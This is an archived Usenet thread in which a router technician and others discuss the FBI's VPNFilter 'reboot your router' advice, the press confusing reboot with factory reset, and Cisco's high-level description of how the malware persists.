National Reboot your Router Day

Thanks to media attention, the FBI has provided me with a busy day or two. According to the press release, we're expected to reboot every router to flush out the malware the evil Russians have installed: The list of affected routers is rather small: Easy enough. What could possibly go wrong?

Well, some experts, news agencies, and pundits have mixed up "reboot" with "reset" your router[1]. Instructions are provided for inserting paper clips and sharp instruments into any available hole in the back of the router. Few seem to offer assistance in identifying which box is the router. Doing a reboot will preserve the router settings. Doing a reset will wipe them clean and precipitate a support call (to me). So far, I only have 2 router reconfigurations on my schedule for today, but I'm sure there will be more.

Therefore, I would like to thank everyone involved for generating the work, and special thanks to Comcast and AT&T for disabling customer firmware updates and save settings in their gateways and routers.

Update: I just received a phone call asking which box is the router. This is going to be an interesting day.

[1] The probable culprit is the various Comcast VoIP gateways that have an optional built in backup battery. In order to reboot these, it is necessary to unplug the power from the gateway, remove the battery for about 15 seconds, plug the battery back in, plug the power back in, and watch the lights come sloooooowly back on.
--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann
Loading thread data ...

Watched to local news last night, anyone following their instructions will *reset* his router to the defaults.

See the "Gell-Mann Amnesia Effect" for further details.

Reply to
Jerry Peters

I'm not bothered if the Russians hack my route (as if!) - there's far worse than them out there.

--
This message may be freely reproduced without limit or charge only via  
the Usenet protocol. Reproduction in whole or part through other  
 Click to see the full signature
Reply to
Cursitor Doom

All the weekly attempts to log into my server traceroute back to China, not Russia. I suppose it could be those fiendishly clever Russians spoofing, of course.

Reply to
Fred Smith

Yep. That's because the average reporter or announcer doesn't know the difference between reboot, reset, restart, power cycle, cold boot, hot boot, etc. Little surprise because the older computahs had a button labeled "reset" that did a "reboot". However, when the button moved to modems and routers, it did both a reset (wipe all settings), and a reboot (restart the OS). I partly solved the problem by covering the hole with a round label inscribed with "$35" which is what it will cost them to have me drive over to their office and put Humpty Dumpty back together again.

Of course, nothing happens without a suitable conspiracy theory. In this case, I must ask why the FBI insisted that everyone reset their routers when only a few models are susceptible. Also, ISP's like AT&T, can easily reboot their customers routers using SNMP. My initial guess was that the FBI thought it better to be sure than sorry when dealing with credential sniffing malware. However, the FBI has never been known for such lofty sentiments. My guess(tm) is that this may well be the first technical action in recent memory that the FBI has performed mostly correctly. They may need the good publicity it brings to compensate for the general impression of gross incompetence demonstrated by the Apple iPhone unlocking fiasco.

Unfortunately, my prediction of personal economic enrichment may have been premature. National Reboot Your Router Day has produced only two paying service calls and a few unprofitable phone calls and emails. Very disappointing. Still, I predict additional press releases in the future by the FBI to remind us that we're being successfully protected from the machinations of the Russians.

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

No need to hack your own route. Just use the "route" command to direct your packets to whever you want:

Most automated attacks arrive from hijacked client computers or botnets. For DDoS attacks, it looks like attacks originating in the USA are the major culprits, with China in 2nd place: More of the same: etc...

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

You don't charge enough. It costs 3-4 times that to have a plumber call.

More likely the FBI is helping the NSA install their own sniffers into every router that gets rebooted, and not just the vulnerable ones. Of course, that theory presumes competence, so it's probably wrong.

Reply to
Clifford Heath

Also: "Cisco said part of the code used by VPNFilter can still persist until the affected device is reset to its factory-default settings."

So a reset actually might be required.

Little surprise because the older computahs had a

Reply to
Clifford Heath

Or some 400 lb guy living in his mother's basement. ;-)

--
"I am a river to my people." 
Jeff-1.0 
 Click to see the full signature
Reply to
Fox's Mercantile

this case, I must ask why the FBI insisted that everyone reset their routers when only a few models are susceptible."

They insisted ? Fukum, I didn't do it. Hold on, there's a knock at the door ...

...

...

Don't worry, I shot them. Now, is this possibly the cause of my having trou ble to get to certain sites ? These are mainly sites I have never been to b efore. Everything I normally use is alright, but anything new seems to time out and that is in more than one browser.

Maybe some DNSes got screwed up or something like that, but the places I fr equent have a backup somewhere ?

Reply to
jurb6006

You're right. Here's the source of the Cisco recommendation: See "Stage 1 (Persistent Loader)" section: VPNFilter's stage 1 malware infects devices running firmware based on Busybox and Linux, and is compiled for several CPU architectures. The main purpose of these first-stage binaries is to locate a server providing a more fully featured second stage, and to download and maintain persistence for this next stage on infected devices. It is capable of modifying non-volatile configuration memory (NVRAM) values and adds itself to crontab, the Linux job scheduler, to achieve persistence.

So, it looks like I might be doing some reset to defaults and firmware updates on affected routers. The crontab file is probably in the firmware. Argh.

Incidentally, of the two customers who reset their routers to defaults, I was able to recover by walking them through the initial setup to get their device on the internet, and then restoring their saved settings, which I save for every router I configure. I didn't charge either customer if they promised to never do that again. However, if they're on the affected router list, I'll need to visit them and update the firmware.

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

The list of potentially affected routers has been expanded by Cisco:

--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 
 Click to see the full signature
Reply to
Jeff Liebermann

ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.